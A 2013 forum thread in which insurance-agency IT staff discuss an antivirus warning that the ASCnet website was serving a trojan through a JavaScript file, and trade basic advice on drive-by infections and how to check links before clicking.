Warning! The ASCnet site maybe infected with a Virus.

Started by Ben Thoele, February 18, 2013, 11:32:32 AM

Previous topic - Next topic

0 Members and 3 Guests are viewing this topic.

Ben Thoele

Sophos AV kicks out the following warning when I visit the ASCnet site.

   Virus/spyware 'Troj/Iframe-JG' has been detected at "www.ascnet.org/AM/HierMenu/HM_ScriptDOM.js"
     
Ben Thoele, I.T. Coordinator
TAM 12.2
33 Users
Mahowald Insurance
Saint Cloud, MN

Ben Thoele

Sophos Labs confirmed that the ASCnet.org is infected with Troj/Iframe-JG.

Aaron over at ASCnet is working with their web hosting provider to get it resolved.  He said he would email me when it's fixed.   I will follow-up when I hear from him.
Ben Thoele, I.T. Coordinator
TAM 12.2
33 Users
Mahowald Insurance
Saint Cloud, MN

Charlie Charbonneau

Yikes!   Is that the free stoof you get with membership?!
Charlie Charbonneau
GBMB Insurance
San Antonio TX.

EPIC 2022, CSR24, Windows 2012 Hyper-V & 2016, Win10/11 Pro Stations, Sophos Anti-Virus.
.                .                 ..              ...

DebAmstutz

Here are a couple of questions from someone not well-versed on the topic of virii.

How does a site like that (or any) become infected?

How would it get passed to me if I visit the site?

I delete email when I do not recognize the sender, and as far as I know, I've not had any virii on my workstation.  Seems like everyone else in the office has had to be "disinfected" but not me.
Deb Amstutz
Missing TAM 5 days a week

Jim Jensen

Deb, lots of websites have malicious software that have become imbedded in them. A lot of sites run small programs (scripts) in order to make them look nice or have certain functionalities. Some use Java, while others use Flash. These scripts run on your computer. This is why you've seen the warnings about issues with Java and that you need to either disable it, or apply a patch (when they are available). If someone infiltrates and website and leaves behind malicious coding, it can run on yours just by going to the website. Email is only one way to obtain a nasty on your computer.
Jim Jensen
CIC, CEO, CIO, COO, CFO, Producer, CSR, Claims Handler, janitor....whatever else.
Jensen Ford Insurance
Indianapolis

Ben Thoele

#5
Quote from: DebAmstutz on February 18, 2013, 12:37:26 PM
Here are a couple of questions from someone not well-versed on the topic of virii.

How does a site like that (or any) become infected?

How would it get passed to me if I visit the site?

I delete email when I do not recognize the sender, and as far as I know, I've not had any virii on my workstation.  Seems like everyone else in the office has had to be "disinfected" but not me.

Here is a great You Tube Video I showed our staff to help understand this.
http://www.youtube.com/watch?v=EK6BBYmiVpo&feature=share&list=PL4E9816850A80ED8E

I wouldn't visit ASCnet, for now, unless you are prepared to reload your computer.  And that's the rule of thumb I use for all internet browsing at work.  Is the site "work related" and or, am I willing to deal with the repercussions.  Since there is no 100% safe web surfing I advise users to browse based on a cost/benefit analysis.   Is the site I'm going to worth the potential risk to my work computer.  If a user is infected from a vacation site, then they are in trouble.  If they get a virus from Travelers.com then they are O.K. because that's a cost of doing business.    Hopefully you're not paying to rebuild computers so your employees can plan their vacations at work.


Ben Thoele, I.T. Coordinator
TAM 12.2
33 Users
Mahowald Insurance
Saint Cloud, MN

Marie (Zionkowski) Gozikowski

Ben - what a great link... thanks for posting it!  I am going to have my users watch them all :-)
Marie (Zionkowski) Gozikowski
Iddings Insurance Agency
Wyalusing, PA
WinTAM 11.1    SBS 2003 
8 users

Lynne Desrochers

Lynne Desrochers

Ben Thoele

Quote from: Lynne Desrochers on February 18, 2013, 01:17:07 PM
Hey, how do we know that link is safe?  : )
Good Question.  I look at the domain,  in this case It's www.youtube.com which I trust.  If I receive an Insurance Marketing email and the link points to www.hellspawn.com I don't click on it.  If you can't see the link you can "mouse over" or hover over the link to see where it points.  This way you to inspect the link before you click on it.  An email from Travelers.com should include links to www.Travelers.com/whatever not to  www.russianmalwarehost.com/virus or whatever.

Does that help? 
Ben Thoele, I.T. Coordinator
TAM 12.2
33 Users
Mahowald Insurance
Saint Cloud, MN

Marie (Zionkowski) Gozikowski

I have Youtube blocked at work, but it looks like you can also view these videos directly from Sophos' site:

http://www.sophos.com/en-us/security-news-trends/anatomy-of-an-attack.aspx
Marie (Zionkowski) Gozikowski
Iddings Insurance Agency
Wyalusing, PA
WinTAM 11.1    SBS 2003 
8 users

Ben Thoele

Looks like the Ascnet site is fixed for now.  At least they made a change and when I go there it's doesn't set off our AV. 

Surf at your own risk!
Ben Thoele, I.T. Coordinator
TAM 12.2
33 Users
Mahowald Insurance
Saint Cloud, MN

Bloody Jack Kidd

It can happen to many sites, although often enough the malicious content is actually served from a site other than the one you are visiting. In this case it could be a few things, like Sophos getting a bit too paranoid, in which case the javascript in question may not be as dangerous as this makes it appear.

Another possibility is that the site has been compromised and malicious code has been planted there.

I would point a finger a snicker, but this can and does happen to even the most well-run and secure sites. In fact, recently Bit9 a company on the bleeding edge of application white listing got hacked and delivery malware out to their own clients.
Sysadmin - Parallel42

Gene Foraker

I don't know how the message board get a virus, but don't forget that there is a "files" area where you can download files.   There may have been something there.
Gene Foraker CPCU
Gates-Foraker Insurance Agency
Norton, OH


My posts are a natural hand made product. The slight variations in spelling and grammar enhance its individual character and beauty and in no way are to be considered flaws or defects.

Mark

Interesting.  So, the .js file was probably compromised?  I looked at that file and realized that I don't read JavaScript files, but it looked like it was trying to determine what type of browser you were using.
Mark Piontek, MBA
Director of Information Systems
BS in Information Systems Security

Bloody Jack Kidd

Quote from: Mark on February 19, 2013, 11:00:53 AM
Interesting.  So, the .js file was probably compromised?  I looked at that file and realized that I don't read JavaScript files, but it looked like it was trying to determine what type of browser you were using.

browser / platform id is a very common javascript trick - nothing malicious about that in and of itself - but malicious sites looking to exploit a system will often first determine what you are running and then deliver the appropriate payload.
Sysadmin - Parallel42